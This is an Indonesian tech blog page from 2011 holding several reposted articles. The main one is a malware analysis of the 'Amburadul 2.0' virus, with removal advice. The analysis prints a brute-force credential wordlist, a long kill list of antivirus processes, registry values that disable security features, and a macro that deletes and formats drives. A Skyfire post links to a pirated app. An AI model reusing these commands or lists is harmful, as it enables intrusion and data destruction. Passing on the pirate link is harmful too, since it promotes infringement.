search

google translate

Rabu, 22 Juni 2011

Mengenal IPv6

IP versi 4 habis! Begitu judul yang menghias banyak kanal berita. Bulan Februari kemarin, IANA (lembaga yang mengatur penggunaan IP di seluruh dunia) memang sudah tidak memegang alamat IPv4 lagi.
Semua slot sudah dibagikan ke seluruh dunia melalui koordinator tiap benua. Jika slot di koordinator tiap benua itu habis juga, berarti IPv4 resmi ludes.
Apakah berarti ini “kiamat” bagi dunia internet? Sebenarnya tidak juga. Sejak tahun 1999, telah terbentuk forum yang bertugas membuat standar baru yang disebut IP versi 6 (IPv6). Ketika IPv4 habis, kita tinggal pindah ke IPv6. Cuma karena yang “pindah” adalah seluruh infrastruktur internet, prosesnya terbilang ribet dan membutuhkan dana yang tidak sedikit. 
Namun untuk masa depan yang lebih baik, kita semua memang harus pindah ke IPv6. Bahkan untuk mendorong gerakan itu, besok akan diadakan hari IPv6. Bagi Anda yang masih belum memahami soal tersebut, inilah sekelumit penjelasan soal Internet Protocol serta kelebihan yang ditawarkan IPv6.

Apa itu Internet Protocol?
Internet Protocol (IP) adalah standar yang mengatur bagaimana dan lewat mana paket informasi dikirim dari jaringan internet maupun intranet. Agar paket data sampai ke tujuan yang benar, tiap perangkat yang terhubung ke internet harus memiliki alamat IP (IP Address) yang unik. Jika ada dua perangkat memiliki IP yang sama, maka akan terjadi yang disebut “IP Conflict” karena paket akan bingung mau mengarah ke mana.

Apa Masalah IPv4?
Ketika dibuat tahun 1981, IP versi 4 mengunakan 32-bit alamat, atau “hanya” sekitar 232 (4,3 milyar) alamat. Dari jumlah itu, sekitar 18 juta alamat digunakan untuk private network dan 270 juta untuk multicast adresses, sehingga tidak bisa digunakan untuk publik. Sebenarnya jumlah yang tersisa masih sangat banyak, namun lebih banyak lagi perangkat yang terhubung ke internet. Alhasil, alokasi alamat yang dimiliki IPv4 sudah tidak mencukupi lagi. Karena itulah kita membutuhkan IP versi 6 yang memiliki lebih banyak alamat.

Kapan Alamat IPv4 akan Habis?
Tergantung area, tapi setidaknya 1 sampai 3 tahun lagi. Ribut-ribut kemarin lebih disebabkan APNIC (organisasi yang mengatur penggunaan IP di Asia Pasifik) telah meminta dua tambahan blok IP Address ke IANA (yang mengatur penggunaan IP sedunia). Permintaan tersebut menyebabkan blok IP Address yang tersisa tinggal 5 (satu blok memiliki 16,8 juta alamat). Sesuai peraturan, jika blok IP yang tersisa tinggal lima, maka harus langsung dibagi ke 5 pengurus IP di tiap benua. 
Seberapa lama IP Address itu akan habis tergantung laju penggunaan internet di benua tersebut. Benua dengan laju penggunaan internet cepat seperti Asia Pasifik atau Amerika Utara mungkin dapat menghabiskan blok yang tersisa dalam tempo 1 tahun. Namun bagi benua yang penetrasi internetnya sudah meluas seperti Eropa, atau yang penetrasi internetnya masih lambat seperti Afrika dan Amerika Latin, waktu yang tersisa bisa tahunan.

Jadi IPv4 benar-benar habis?
Sebenarnya masih ada beberapa blok di luar sana yang tidak terpakai. Bahkan menurut John Heideman, peneliti dari University of Southern California, penggunaan IPv4 sebenarnya hanya 14%. Namun agak sulit menarik kembali IP Address yang sudah terlanjur tersebar. Sumber permasalahannya terjadi awal perkembangan internet, ketika pembelian alamat IPv4 cuma terbagi dalam 3 pilihan blok: /8 (16,7 juta alamat), /16 (65 ribu alamat), dan /24 (256).  Bagi perusahaan atau universitas yang membutuhkan (misalnya) 67 ribu IP Address, mereka mendapatkan satu blok /8 sejumlah 16,7 juta alamat.
Beberapa pihak seperti Universitas Stanford atau Departemen Pertahanan AS telah dengan sukarela mengembalikan IP Address yang tidak mereka gunakan. Namun masih banyak pihak seperti MIT, IBM, Apple, AT&T, atau Ford Motor yang belum menentukan sikapnya. Pihak ARIN bisa saja meminta mereka mengembalikan jatah itu, namun mengingat populasi IPv4 yang kini terbatas, pemilik IPv4 tersebut bisa saja menjadikannya sebagai aset berharga. Bahkan belakangan tersembul kabar beberapa pihak yang masih memiliki blok IPv4 menjualnya dengan harga tinggi.

IPv6 bisa mengatasi keterbatasan alamat tersebut?
Iya, karena kapasitas pengalamatan ini naik dari 32-bit menjadi 128-bit (2128) atau tepatnya 340.282.366.920.938.463.463.374.607.431.768.211.456 alamat IP. Di masa datang alamat sebanyak itu mungkin juga akan habis, namun setidaknya situasi terkendali sampai ratusan tahun dari sekarang. 
Sistem pengalamatannya IPv6 sendiri menggunakan delapan kelompok kuartadesimal yang dipisahkan titik dua. Ini berbeda dengan sistem pengalamatan IPv4 yang menggunakan empat kelompok tridesimal. 
IPv4 192.168.0.1
IPv6 2001: cdba: 0000:0000:0000:0000:3257:9652

Wah, Beda Banget ya?
Iya. Secara nama beda, secara teknologi pun berbeda. Itulah mengapa kedua protokol ini tidak saling kompatibel. Komputer yang ber-IPv4 tidak dapat menemukan mail server ber-IPv6, begitu pula sebaliknya.
Namun bukan berarti internet akan macet. Paket yang dikemas dalam sistem IPv6 bisa dikemas ulang menjadi paket IPv4 sehingga komunikasi data tetap bisa terjadi. Namun cara ini tentu saja merepotkan dan boros sumber daya, sehingga berpotensi menurunkan kecepatan internet secara signifikan. Karena itu, cara terbaik adalah semua orang pindah ke IPv6. 
Oke, saya akan migrasi ke IPv6. Bagaimana caranya?
Untuk mengadopsi IPv6, dibutuhkan dukungan hardware maupun software. Di sisi end-product alias perangkat yang kita gunakan sehari-hari, relatif tidak ada masalah. Mayoritas kartu jaringan di dalam komputer, notebook, maupun smartphone masa kini telah mendukung IPv6. Begitu pula di sisi software. Windows sejak generasi XP Service Pack 1 sudah mendukung IPv6, begitu pula Mac OS X versi 10.2 dan semua distro Linux.
Akan tetapi, masalah mulai rumit ketika menyentuh perangkat akses internet, seperti modem Anda. Mayoritas modem yang diberikan penyedia jasa internet belum mendukung IPv6, sehingga harus diganti atau di-upgrade. Di sisi backbone, permasalahan lebih pelik lagi. Server, router, load-balancer, dan semua node harus diganti agar mendukung IPv6.
Jadi inti permasalahan bukan di sisi pengguna biasa, namun di sisi infrastruktur. Karena besarnya usaha dan investasi yang harus dikeluarkan, proses migrasi ini bisa berlangsung tahunan. 

Jadi, industri belum siap?
Siap tidak siap, kita harus pindah. Beberapa negara seperti Amerika Serikat, Kanada, Perancis, Jepang, China, dan Korea Selatan juga sudah melakukan beberapa kebijakan untuk mendorong percepatan migrasi IPv6. 
Dan pada tanggal 8 Juni 2011 besok, diadakan Hari IPv6 sedunia. Agenda besarnya adalah melakukan uji coba IPv6 selama 24 jam. Perusahaan yang ikut serta antara lain Google, Facebook, Yahoo, Akamai, dan Limelight Networks. Mudah-mudahan, langkah ini bisa mendorong industri untuk bermigrasi ke IPv6.
sumber: www.infokomputer.com
Read More..

Sabtu, 02 April 2011

Review Coranti 2010

Nama-nama seperti AVG, McAfee, Norton, dan Kaspersky mungkin sudah umum Anda dengar sebagai antivirus populer dewasa ini. 
Di setiap aplikasi penghajar virus ini, tersimpan engine khas yang menjadi mesin utama antivirus menjalankan aksi perlindungannya. Tentu saja, setiap engine memiliki karakter tersendiri sesuai tingkat keandalannya.
Nah, yang kali ini hadir dari Coranti 2010 tergolong istimewa. Pasalnya, aplikasi ini justru menghadirkan perlindungan yang dibangun dari empat buah engine sekaligus (QuadShield), yakni BitDefender, Norman, FProt, dan Lavasoft.
Nama Coranti memang belum terlalu populer di tanah air. Namun, mereka berani menawarkan kemampuan yang tak kalah hebat dengan aplikasi proteksi sistem lainnya. Empat engine dari antivirus terkenal di Coranti 2010 berjalan bersamaan dalam mendeteksi virus, trojan, hingga spyware dengan update terkini.
Perlu Anda ketahui, model gabungan engine seperti ini akan lebih optimal membasmi setiap ancaman dibandingkan digunakan secara terpisah seperti antivirus pada umumnya. Tetapi, jika diperlukan – misalnya jika spesifikasi PC Anda tergolong lawas, setiap engine ini bisa dinonaktifkan (disable) agar kinerja sistem bisa lebih baik.
Ada dua modul utama di Coranti 2010: antivirus dan anti-spyware. Dalam setiap aksinya, mereka menggunakan analisis heuristik dan kecerdasan buatan (artificial intelligence) untuk menemukan tiap ancaman dengan cepat.
Namun, sepanjang pengalaman kami, kinerja analisis virus dan spyware oleh program (yang kompatibel untuk Windows 32-bit dan 64-bit) ini tergolong menyita cukup banyak sumber daya CPU. Walhasil, Anda yang belum memakai prosesor dual-core, mungkin akan merasakan kinerja sistem jadi sedikit melamban. Untuk itu, Anda bisa menonaktifkan satu atau dua engine yang digunakan Coranti.
Dari segi antarmuka, kami rasa Coranti tidak jauh berbeda dengan aplikasi-aplikasi antivirus lainnya. Dengan dominasi warna biru, halaman awal menampilkan sejumlah menu utama, seperti Active Protection, Full Scan, dan Update. Di sinilah Anda bisa mengatur aktivasi setiap engine dan feature yang kiranya diperlukan serta memulai proses pemindaian sistem.
Namun, mesti dicatat, pada saat instalasi pertama kali, Anda harus memastikan PC terhubung dengan internet. Pasalnya, seusai proses instalasi, Coranti mewajibkan untuk memperbaharui signature virus. Ukuran berkas yang harus diunduh pun cukup besar. Kalau hal ini tidak dilakukan, seluruh feature Coranti tidak akan bisa aktif. (Deny Prasetyo)
***
Coranti 2010 bisa menjadi aplikasi alternatif perlindungan PC dari serangan virus danspyware. Dengan empat engine terintegrasi, hasil pemindaian sistem pun lebih presisi.


Spesifikasi Coranti 2010
Lisensi
39,9 (1 pengguna)
Besar Installer
45,9 MB
Situs Web
Sistem Operasi
Windows XP/Vista/7 (32/64-bit, Windows Server 2003/2008)




Empat Engine

Inilah kelebihan Coranti dibanding antivirus lain, yakni keberadaan empatengine antivirus sekaligus: BitDefender, Norman, F-Prot, dan Lavasoft.






Atur Setelan 

Pengaturan Coranti antara lain bisa dilakukan untuk menyetel level “kekejaman” dan kedalaman pemindaian serta sistem heuristik yang dipakai.







Antispyware 

Modul anti-spyware tersedia dari Lavasoft guna mendeteksi keberadaan aplikasi berbahaya yang mengincar data-data penting di PC pengguna.



Plus     : Keberadaan empat engine antivirus yang terintegrasi; pemindaian lebih presisi; tersedia e-mail scanner
Minus : Instalasi pertama harus ada internet; kinerja pemindaian dengan empat enginecukup rakus memori
Skor Penilaian
- Penggunaan     : 4,25
- Kinerja               : 4
- Fasilitas             : 4
- Harga                : 3,75
- Skor total           : 4

sumber: www.infokomputer.com
Read More..

USB MojoPac Freedom 1.8

Hampir seluruh aplikasi portabel adalah freeware. Sampai dengan saat artikel ini ditulis, kami belum menemukan aplikasi komersial yang dibuat versi portabelnya. 
Nah, bagaimana solusi untuk membawa aplikasiaplikasi berbayar tersebut ke media simpan portabel dan menjalankannya di komputer mana saja?
Salah satu alternatif yang kami ajukan adalah menggunakan aplikasi MojoPac keluaran RingCube.
Secara garis besar, aplikasi ini akan membentuk lingkungan virtual sistem operasi Microsoft Windows ke dalam media simpan portabel dan memungkinkannya menginstall aplikasi-aplikasi komersial (maupun nonkomersial) yang tidak portabel.
Berdasarkan pengujian, kami sarankan Anda menggunakan media simpan yang mendukung interkoneksi USB 2.0 agar eksekusi dapat berjalan relatif cepat.
Sediakan ruang kosong dalam media simpan portabel minimal 128 MB hanya untuk sistem operasi virtual. Jika Anda ingin menginstalasi aplikasi tambahan, berikan ruang kosong yang cukup besar. Sebaiknya, gunakan komputer dengan RAM minimal 512 MB dan prosesor minimal sekelas Pentium III 933 MHz.
Jika Anda ingin menggunakan MojoPac secara gratis, pilih paket berkas instalasi yang berlabel Freedom. Versi berbayar menyediakan fasilitas keamanan, pencetakan PDF, pembaruan (update) signature keamanan, serta dukungan teknis.
Setelah MojoPac terpasang, buka media simpan portabel. Akan terlihat beberapa direktori khas sistem Windows XP, yaitu: WindowsProgram FilesDocument and Settings, sertatemp. Kliklah beruntun pada ikon Start, maka sistem operasi tamu (guest OS ) Windows XP dalam MojoPac akan dijalankan di atas sistem operasi tuan rumah (host OS) yang ada di komputer. Akseslah direktori penyimpan berkas instalasi aplikasi nonportabel dan lakukan instalasi seperti biasa.
Beberapa operasi manajemen sistem operasi virtual dapat Anda lakukan lewat menu Start > Control Panel dalam guest OS tersebut. Untuk berpindah ke host OS, klik saja tombolHost-Switch di bagian atas layer desktop(Vincent Bayu Tapa Brata)
***
MojoPac adalah solusi virtualiasasi untuk membawa dan menjalankan aplikasi-aplikasi komersial (yang umumnya adalah non portabel) dalam media simpan portabel. Sangat membantu untuk pengguna komputer dengan mobilitas tinggi.

Spesifikasi
Jenis
Freeware
Ukuran berkas instalasi
22,1 MB.
Situs web
Sistem operasi
Windows XP.

sumber: www.infokomputer.com
Read More..

Senin, 17 Januari 2011

P3K untuk VIRUS AMBURADUL versi 2.0 : Virus dengan Teknologi Hacking beragam Metode Modern

Amburadul.. begitulah kata yang terucap ketika seseorang terinfeksi virus yang berakibat fatal sampai user tak bisa makan, minum mapun tidur, gara2 semua data amburadul alias hilang entah bagaimana ceritanya, tiba-tiba "ntldr missing" ketika di PC dinyalakan. Virus ini tergolong virus akhir tahun yang berakibat fatal, yang sebelumnya versi 1.0 dari virus ini cukup menghebohkan dengan kritik 'bahasa inggris si pembuat virus ancur lebur', dalam versi 2.0 ini si pembuat mengunakan bahasa indonesia, mungkin belum sempat untuk kursus inggris.

Virus masih dalam keluarga VB & Delphi yang di pack mengunakan UPX / PE Lite dengan mengadopsi file .pif/.cmd/.bat sebagai tringger route dengan mengunakan MacroX dan mengunakan celah keamanan VNC (remote control) port 590X. Virus lokal amburadul mengunakan celah keamanan dari share folder dan network device dengan mengunakan metode ipc$, admin$, serta brute force untuk menjalankan aksinya, tiba-tiba data/settingan kembali ke semula (default), demikian file/folder yang tersharing, lenyap berserta dengan file2nya, sekaligus box linuxpun ikut dikerjai dengan beberapa exploit yang ada didalam tubuh virus.

Sampai akhir desember 2010 ini, Vaksincom mendapakan laporan lebih dari 210 pelapor dalam 1 bulan terakhir ketika virus diperkirakan menyebar lewat YM, E-mail serta situs2 jejaring social seperti facebook, twiiter dan linkedin, yang menutup tahun 2010 dengan "Virus of The Year". Diperkirakan pembuat berasal dari Semarang, Indonesia seorang mahasiswa yang juga tergabung dalam group hacker turki "iSKORPiTX" dengan nick "The Conflickzer", diketahui dari file trojan/backdoor dari badan file yang merupakan file pendukung untuk hacking dan beberapa exploit untuk mengexploitasi sistim operasi khususnya bagi penguna Linux.

Selain itu virus memiliki teknologi Multipolymorhpic yang merupakan file induk berupa karakter teracak dengan badan virus yang teracak juga, hal ini membuat sulit vendor antivirus untuk membuat antivirus yang tepat untuk virus ini. Selain itu virus mengunakan Macro Recording, dimana pada saat2 tertentu, mouse seakan2 berjalan sendiri dengan ketikan keyboard untuk menghapus seluruh file sistim/data pada komputer user. Ikuti perjalanan team Vaksincom membongkar virus Amburadul versi 2.0 ini.
1. Nama Virus : W32.Amburadul-2 alias Ambrol-II/PoisonIvy/DeadLock/MatroX/Brontx.EQ/D.ALL

2. Asal Pembuat : Semarang - Indonesia

3. Dibuat dengan : Batch File adopt dari file .pif, .cmd, bat mengunakan MacroX & AutoIt dengan kompresi UPX / PE Lite dan Backdoor / Trojan dibuat mengunakan bahasa pemograman VB & Delphi.

4. Efek : Vaksincom mencatat ada 10 efek nyata yang dilakukan oleh Virus Amburadul sesuai dengan tringger routine virus, seperti :
Menghapus seluruh file offline pada drive Z s/d C secara berurutan, dengan memberi label volume "AMBURADUL" mengunakan batchfile/macrox (port 5900/vnc)
Mengformat data drive Z s/d C (kecuali sistim) dengan menganti label selain drive C dengan "AMBURADUL" dengan metode yang sama (no. 1).
Injeksi ke Internet Explorer dengan menambahkan System Down – hacked by iSKORPiTX (hacker turki yang memiliki backdoor / trojan celah keamanan pada rpc-windows.
Mematikan fungsi antivirus dengan cara melakukan uninstall dan mematikan proses penjagaan (guarding) antivirus/firewall.
Mengirimkan informasi typing horse ke iskorpitx@yahoo.com dan conflickzer@yahoo.com berupa update status virus dan info pc terinfeksi berupa key trapped.
File induk terletak pada badan file sistim windows (svchost.exe, csrss.exe, alg.exe) yang digunakan oleh virus conficker dengan menyebabkan rpc hole berakibat jaringan down/looping.
Mengunakan Macro Recording untuk menjalan aksi lewat remote VNC (port 5900), yang merupakan bug dari vnc versi 4 dengan membypass password default.
Menginject jaringan dengan metode IPC$ pada bug sharing pada Windows dengan melakukan direktori network listing untuk menjalankan aksi menghapusan file/data.
Mencoba untuk masuk ke sistim keamanan jaringan Windows / Linux dengan mencoba beberapa username dan password dengan metode bruteforcing. Dengan informasi user/password yang dicoba sbb :

Username yang di gunakan :
- admin
- administrator
- [namakomputer]
- [namaworkgroup]
- [namauser]
- [namafilesharing]
- [namadomain]
- root
- master
- manager
- system
- sysadmin
- sysop
- SUPPORT_388945a0
- ASPNET
- HelpAssistant

dengan password dala file wordlist :
- admin
- administrator
- password
- admin123
- adm
- 123456
- 12345
- 1234567
- qwerty
- root
- [namakomputer]
- [namaworkgroup]
- [namauser]
- [namafilesharing]
- [namadomain]
- *blank*
- ..dll
Dan mengunakan teknik Bruteforcing dengan mencoba karakter A-Z, a-z,
0-9, !@#$%^&*()-{}\<> untuk menembus jaringan lokal mapun alat -
alat device seperti print server, router, access point, fingerprint, pabx,
wacom, cctv, dll.

Membuat schduler pada Windows berupa tringger aktif dan Linux berupa crontab serta injeksi registry pada file.com, .exe, .pif, .lnk, .cmd, .txt, .jpg, dengan menambahkan explorer pada svchost.exe, userinit.exe dan winlogon.exe saat komputer di restart dan mematikan fungsi system restore dan windows/linux firewall.
5. Media Sebar : Flashdisk, e-mail (attachment/.lnk) dan Yahoo messenger.

6. Security Vuln : Merusak sistim kekebalan baik oleh Windows Firewall mapun aplikasi security seperti :

A2CMD, A2FREE A2GUARD A2SERVICE, ADVCHK, AGB, AHPROCMONSERVER, AIRDEFENSE, AKRNL, ALERTSVC, AMON, ANTIVIR APVXDWIN, ARMOR2NET, ASHAVAST, ASHDISP, ASHENHCD, ASHMAISV, ASHPOPWZ, ASHSERV, ASHSIMPL, ASHSKPCK, ASHWEBSV, ASWSCAN, ASWUPDSV, AVAST AVCENTER AVCIMAN, AVCONSOL, AVENGINE, AVESVC, AVEVAL, AVEVL32, AVGAM AVGCC, AVGCC32, AVGCHSVX, AVGCSRVX, AVGCTRL, AVGEMC, AVGFWSRV, AVGNSX, AVGNT, AVGNTMGR AVGSERV, AVGTRAY, AVGUARD, AVGUPSVC, AVGWDSVC, AVINITNT, AVIRA AVKSERV, AVKSERVICE, AVKWCTL, AVP, AVP32, AVPCC, AVPM, AVSCHED32, AVSERVER, AVSYNMGR, AVWUPD32, AVWUPSRV, AVXMONITOR AVXQUAR, AVZ, BDSWITCH, BITDEFENDER, BLACKD, BLACKICE, CAFIX, CCEVTMGR, CCSETMGR, CFIAUDIT, CFP, CFPCONFIG, CLAMTRAY, CLAMWIN, CUREIT, DEFENDERDAEMON, DEFWATCH, DRVIRUS, DRWADINS, DRWEB, DWEBIO, DWEBLLIO, EKRN, ESCANH95, ESCANHNT, EWIDOCTRL, EZANTIVIRUSREGISTRATIONCHECK, F-AGNT95, F-SCHED, F-STOPW, FAMEH32, FILEMON, FIREWALL FORTICLIENT, FORTISCAN, FORTITRAY, FPAVSERVER, FPROTTRAY, FPWIN, FRESHCLAM, FSAV32, FSAVGUI, FSBWSYS, FSDFWD, FSGK32, FSGK32ST, FSGUIEXE, FSMA32, FSMB32, FSPEX, FSSM32, GCASDTSERV, GCASSERV, GIANTANTISPYWARE, GUARDGUI, GUARDNT, GUARDXKICKOFF, GUARDXSERVICE, HREGMON, HRRES, HSOCKPE, HUPDATE, IAMAPP, IAMSERV, ICLOAD95, ICLOADNT, ICMON, ICSSUPPNT, ICSUPP95, ICSUPPNT, INETUPD, INOCIT, INORPC, INORT, INOTASK, INOUPTNG, IOMON98, IPTRAY, ISAFE, ISATRAY, KAV, KAVMM, KAVPF, KAVPFW, KAVSTART, KAVSVC, KAVSVCUI, KMAILMON, MAMUTU, MCAGENT, MCMNHDLR, MCREGWIZ, MCUPDATE, MCVSSHLD, MINILOG, MYAGTSVC, MYAGTTRY, NAVAPSVC, NAVAPW32, NAVLU32, NAVW32, NEOWATCHLOG, NEOWATCHTRAY, NISSERV NISUM, NMAIN, NOD32 NORMIST, NOTSTART, NPAVTRAY, NPFMNTOR, NPFMSG, NPROTECT, NSCHED32, NSMDTR, NSSSERV, NSSTRAY, NTOS, NTRTSCAN, NTXCONFIG, NUPGRADE, NVCOD, NVCTE, NVCUT, NWSERVICE, OFCPFWSVC, ONLINENT, OP_MON, OPSSVC, OUTPOST PAVFIRES, PAVFNSVR, PAVKRE, PAVPROT, PAVPROXY, PAVPRSRV, PAVSRV51, PAVSS, PCCGUIDE, PCCIOMON, PCCNTMON, PCCPFW, PCCTLCOM, PCTAV, PERSFW, PERTSK, PERVAC, PESTPATROL PNMSRV, PREVSRV, PREVX PSIMSVC, QHONLINE, QHONSVC, QHSET, QHWSCSVC, QUHLPSVC, RFWMAIN, RTVSCAN, RTVSCN95, SALITY SAPISSVC, SAVADMINSERVICE, SAVMAIN, SAVPROGRESS, SAVSCAN, SCANNINGPROCESS, SCANWSCS, SDHELP, SDRA64, SHSTAT, SITECLI, SPBBCSVC, SPHINX, SPIDERCPL, SPIDERML, SPIDERNT, SPIDERUI, SPYBOTSD, SPYXX, SS3EDIT, STOPSIGNAV, SWAGENT, SWDOCTOR, SWNETSUP, SYMLCSVC, SYMPROXYSVC, SYMSPORT, SYMWSC, SYNMGR, TAUMON, TBMON, TMLISTEN, TMNTSRV, TMPROXY, TNBUTIL, TRJSCAN, TROJAN, VBA32ECM, VBA32IFS, VBA32LDR, VBA32PP3, VBSNTW, VCRMON, VPTRAY, VRFWSVC, VRMONNT, VRMONSVC, VRRW32, VSECOMR, VSHWIN32, VSMON, VSSERV, VSSTAT, WATCHDOG, WEBSCANX, WINSSNOTIFY, WRCTRL, XCOMMSVR, ZLCLIENT, ZONEALARM

7. Modifikasi Reg : Selain menyembuyikan dari Task Manager / MsConfig, virus ini
mematikan beberapa fungsi windows dari registry seperti :


AntiVirusDisableNotify = 1
AntiVirusOverride = 1
FirewallDisableNotify = 1
FirewallOverride = 1
UacDisableNotify = 1
UpdatesDisableNotify = 1
Hidden = 2
EnableFirewall = 0

8. File Induk : Memiliki beberapa file induk :
- [fileacak].lnk // Shortcut untuk menjalankan Trojan / Backdoor
- [fileacak].pif // Trojan
- [fileacak].exe // Backdoor
- [fileacak].cmd // Script Otomatis Tringger Routine
- [fileacak].bat // Script Otomatis Tringger Routine

Terletak pada seluruh direktory file sharing maupun [drive]:\ [windir]\system32

[fileacak] = angka dan huruf dengan beberapa case menyamar sebagai svchost.exe, ctfmon.exe, alg.exe, dan csrss.exe.

9. AutoScript : Memiliki beberapa script berbahaya dengan mengunakan MacroX dengan
mengambungkan dengan port 5900 pada VNC server (bug vnc diissue dari
tahun 2003, dapat di lihat jelas pada :

http://www.realvnc.com/pipermail/vnc...ch/037830.html
http://www.securityspace.com/smysecu....html?id=10758

dengan Script Macro yang dijalankan sesuai dengan tringger routine :


MousePos=45,755
MouseButton=1,1
Activate=Start Menu
Text={UP 3}{ENTER}
Activate=Run
Text=cmd{ENTER}
Activate=Program Manager
Activate=C:\[windir]\system32\cmd.exe
Repeat=26
Drive=Drive+Chr$([Count+1])
Text=[drive]ü{ENTER}cd\{ENTER}
Text=rd /S /Q .{ENTER}
Until=0
Activate=C:\[windir]\system32\cmd.exe
Text=cü{ENTER}cd\{ENTER}
Text=rd /S /Q .{ENTER}
Activate=C:\WINXP\system32\cmd.exe
Text=format /C /Q [drive]:{ENTER}
Text=Label [drive] AMBURADUL
Wait=183
Text=LABEL AMBURADULt{ENTER}
Activate=Exit
Memiliki beberapa Script Macro dengan keyboard mapun mouse untuk menjalakan aksi dengan menyusup melalui celah vnc / port 5900/5901/2

10. Solusi : Untuk mengatasi virus Amburadul versi 2.0 ini sebelumnya kami ingatkan
agar backup data/files senantiasa dan pergunakan username/password yang
tidak baku / standar, lakukan update antivirus secara berkala.
Lakukan pemutusan terhadap jaringan/koneksi
Disable [System Restore] selama proses pembersihan
Matikan proses virus dengan mengunakan Process Explorer, cari beberapa file yang dicurigai seperti svchost.exe, ctfmon.exe, alg.exe dengan byte yang besar dan proses load processor yang tinggi serta beberapa file ext .tmp, .lnk, .sys, .drv dan file ext yang tidak standart.
Agar tidak terinfeksi kembali lakukan pembatasan pada policy windows dengan cara :

Caranya:
-. Start -- Run ketik perintah SECPOL.MSC kemudian klik tombol [OK]
-. Setelah muncul layar Local Security Settings, klik kanan pada menu Software Restriction Policies lalu klik Create New Policies
-. Pada menu Software Restriction Policies, klik Additional Rules
-. Klik kanan pada Additional Rules, kemudian pilih New Hash Rule, dan akan muncul layar New Hash Rule
-. Pada kolom File hash klik tombol Browse, kemudian arahkan ke direktori [C:\Windows\system32\[fileacakvirus.exe] dan klik tombol [Open]
-. Pada kolom Security level pilih [Disallowed]
-. Pada kolom description boleh di isi atau dikosongkan saja
-. Klik tombol [Apply] dan [Ok]

Catatan: Jika komputer Anda tidak terinstall Windows XP Professional / 2003 Server 2000 Server / Vista / 2008 lewati langkah ini.
Hapus string registry dengan mengunakan CureIt dan Repair dengan mengunakan TuneUp Utilities 2010
Jika terinfeksi virus ini, user tidak dapat melakukan booting Windows dengan muncul pesan error NTLDR Is Missing, sebaiknya dilakukan Repiar atau Install ulang.
Sementara untuk file yang telah di hapus, dapat direcovery mengunakan software Recovery seperti getDataBase / EasyRecovery / Recovery My Files dengan mengunakan type delete atau format recovery.
Hapus seluruh file virus dengan mengunakan Kaspersky Virus Removal Tools 2010 yang dapat di download :
http://support.kaspersky.com/viruses...ol2010?level=2
Update patch security terbaru untuk celah port 5900, rpc, ipc$ melalui
site microsoft : http://www.microsoft.com/downloads
Backup Data Anda sekarang juga!!! dan update antivirus!!
Akhir kata penulis berpesan kepada seluruh pengunakan PC di Indonesia, agar membackup data senantiasa secara terperiodik, jangan hanya mengandalkan program security, firewall atau antivirus karena program tersebut selalu kalah selangkah oleh program2 penganggu seperti virus, backdoor, trojan, dll. Lakukan update patch khususnya operating sisitim Microsoft Family, juga Linux disarankan karena virus mulai beralih ke sistim keamanan Linux. Tak lupa Vaksincom mengucapkan Hari Natal 2010 dan Tahun Baru 2011, sampai bertemu pada artikel berikutnya dengan pembahasan yang lebih menarik. Adios Amigos.
Read More..

ubuntu 2 : from zero

Ubuntu memang sistem operasi gratis namun tidak semua yang gratis itu biasa-biasa saja atau bahkan tidak bisa mengalahkan sistem operasi berbayar. Ubuntu adalah contohnya ! Buku ini akan menunjukkan kepada Anda bagaimana ubuntu bisa unggul dalam berbagai hal terutama dalam segi visual efek yang semuanya gratis untuk didapatkan.
Pernah melihat layar yang terbakar oleh api dan desktop berbentuk kubus 3D ? Ah, itu masih belum ada apa-apanya. Pada buku ini, Anda akan mempelajari banyak hal yang dasyat pada ubuntu, diantaranya adalah :
  • Bagaimana menginstall OS seperti Microsoft Windows didalam mesin ubuntu
  • Bagaimana menginstall Aplikasi Windows seperti Microsoft Office didalam ubuntu
  • Bagaimana mempermak tampilan ubuntu Anda sehingga mirip Windows 7
  • Bagaimana membuat dekstop Anda kebanjiran atau kebakaran
  • Bagaimana mengeksploitasi tampilan dan visual efek pada ubuntu
  • Dan masih banyak bagaimana bagaimana Lainnya YANG TIDAK PERNAH ANDA BAYANGKAN SEBELUMNYA!
Buku ini merupakan seri lanjutan dari buku yang berjudul “ubuntu : from zero...” yang juga bisa dibaca tanpa melalui buku pertama bila Anda telah memiliki dasar pengetahuan tentang Linux. Buku kedua ini akan menitik beratkan pembahasan tentang modifikasi tampilan, visual efek dan berbagai macam pernak-pernik lainnya yang akan membuat Anda semakin jatuh cinta pada ubuntu.
Judulubuntu 2 : from zero
PenulisEri Bowo
ISBN978-979-1090-44-5
CDYa
eLearningTidak
IndexTidak
Halaman214
LevelSemua Level

PERINGATAN PENULIS: Menggunakan Ubuntu dapat menyebabkan ketagihan, mata berair (karena kelamaan didepan komputer), kekaguman mendadak, jatuh cinta, hingga bangga yang berlebihan...(karena komputernya jadi keren banget). Penulis tidak bertanggung jawab atas efek samping yang ditimbulkan karena buku ini....

FREE : KALENDER LINUX 2011

sumber: www.jasakom.com
Read More..

Skyfire, Solusi Flash untuk iPad

Akhirnya, browser yang bisa memainkan flash pada iPad, Skyfire tersedia untuk iPad setelah sebelumnya tersedia untuk iPhone. Harga yang ditawarkan untuk aplikasi ini di iTunes 
adalah $ 4.99. Kini, video flash untuk twitter, facebook dan ribuan situs lainnya sudah bukan masalah lagi. Server skyfire yang memanfaatkan cloud computing akan merender video flash menjadi HTML 5 secara transparan sehingga Anda bisa langsung memainkan video flash.

Pada hari yang sama pula, dunia bajakan telah menyebar aplikasi ini yang bisa didapatkan darihttp://www.mediafire.com/?xpdhaci43nbbi9c .
Berikut adalah feature skyfire :
• Play millions of Flash videos – everyday, with no limits!
• All-new ‘Skybar’ toolbar gives one-click access to video and related content
• Stay in touch: Unique Facebook and Twitter ‘Quickview’ allows you to see your wall and feeds with one click.
• Universal ‘Like’: Like ANY page on the internet, with one click.
• Fireplace: See only the links shared by Friends. Why? Filter what friends did from what friends shared (which is a great starting point for browsing)
• Popular: See what Friends and the Facebook community have to say about the site you are currently exploring
• Be informed: Quick access to GReader feeds
• Be social: Share via Facebook and Twitter
• Share to more services including GReader, Instapaper, Pinboard and Read It Later
• Standard browser elements: Tabs, search, sharing, bookmarks, history, etc.
• Full screen option for maximum use of screen real-estate – with scroll to top
• ‘Desktop’ option loads pages as on a desktop browser, giving more flexibility in accessing web sites
• Private Browsing option: Browse with no history and cookies left behind
Read More..
Yahoo bot last visit powered by MyPagerank.Net
Hihera.com
Computers Blogs
Technology Blogs - BlogCatalog Blog Directory